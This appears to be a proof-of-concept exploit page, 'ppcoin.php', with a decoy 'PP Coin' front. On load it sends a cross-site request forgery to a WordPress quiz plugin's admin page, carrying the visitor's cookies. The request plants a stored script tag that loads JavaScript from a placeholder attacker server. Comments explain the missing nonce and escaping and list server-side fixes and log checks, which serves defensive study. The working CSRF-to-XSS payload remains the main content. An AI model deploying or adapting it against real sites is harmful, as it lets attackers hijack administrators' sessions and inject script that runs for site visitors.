ppcoin.php
<html>
<!-- Lure page for the cross-site request sent by the inline script further down.
     The visible content is unrelated to that request (presumably a decoy), and
     jQuery is loaded because the script calls $.ajax. -->
<title>Normal site</title>
<script src='https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js'></script>
<meta charset="utf-8"/>
<center>
<br>
<h1>PP Coin Mine it! Fuck Bitcoin</h1>
<br><br>
<img src='./ppcoin.jpg' style="height: 70%;width: 40%;"></img>
</center>
<script type="text/javascript">
// Proof of concept for a cross-site request forgery (CSRF) that plants a stored
// script-injection value: it submits a "new question" form to a WordPress admin
// page (page=mlw_quiz_options) on another origin, from the visitor's browser.
//
// What the request implies about the target handler
// (NOTE(review): inferred from the request shape; confirm against the plugin code):
//  - the POST body carries no nonce or other anti-CSRF token, so the handler
//    presumably accepts the submission on the session cookie alone;
//  - question_name holds raw script tags, so the PoC only has an effect if that
//    value is stored and later rendered without sanitising or escaping.
//
// Defensive takeaways:
//  - verify a nonce (check_admin_referer() / wp_verify_nonce()) and the caller's
//    capability before saving a question;
//  - sanitise the field on input (sanitize_text_field() / wp_kses()) and escape
//    it on output (esc_html());
//  - browsers that treat cookies as SameSite=Lax by default do not attach the
//    session cookie to a cross-site XHR POST like this one, which blunts the
//    request but is no substitute for the server-side checks;
//  - in web-server logs, look for POSTs to this admin page whose Origin or
//    Referer header is a foreign site.
function exploit(){
// Placeholder: base URL of the WordPress install the request is aimed at.
var targetUrl = 'http://<WORDPRESS HOST>/wordpress'
// Quiz that receives the new question; sent in both the query string and the body.
var quizID = 1
$.ajax(
{
url: targetUrl + '/wp-admin/admin.php?page=mlw_quiz_options&quiz_id=' + quizID,
// Form fields for the "new_question" submission. question_name is the injected
// field; <ATTACKER SERVER> is a placeholder for an externally hosted script.
data: {'question_type': '0', 'question_name': 'PPCOIN<script src="http:\/\/<ATTACKER SERVER>\/ppcoinScript.js"><\/script><script src="https:\/\/ajax.googleapis.com\/ajax\/libs\/jquery\/3.7.1\/jquery.min.js"><\/script>', 'correct_answer_info': '', 'hint': '', 'comments': '1', 'new_question_order': 2, 'required': 0, 'new_new_category': '', 'new_question_answer_total': 0, 'question_submission': 'new_question', 'quiz_id': quizID, 'question_id': '0'},
type: 'POST',
xhrFields: {
// Asks the browser to include the visitor's cookies for the target origin.
withCredentials: true
},
crossDomain: true
// No success/error callback: the page never reads the response, so the
// same-origin policy hiding the reply does not stop the state change.
});
}
// Called as soon as the script is parsed, so the request is sent on page load
// without any click or other interaction from the visitor.
exploit();
</script>
</html>